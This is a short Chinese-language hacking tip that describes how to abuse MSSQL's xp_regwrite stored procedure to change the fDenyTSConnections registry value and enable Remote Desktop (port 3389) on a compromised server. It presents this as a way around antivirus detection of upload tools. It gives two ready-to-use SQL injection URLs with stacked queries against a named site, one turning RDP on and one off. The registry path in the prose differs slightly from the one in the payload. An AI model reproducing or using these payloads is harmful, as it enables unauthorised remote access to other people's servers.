其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。
3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其 中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我 们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;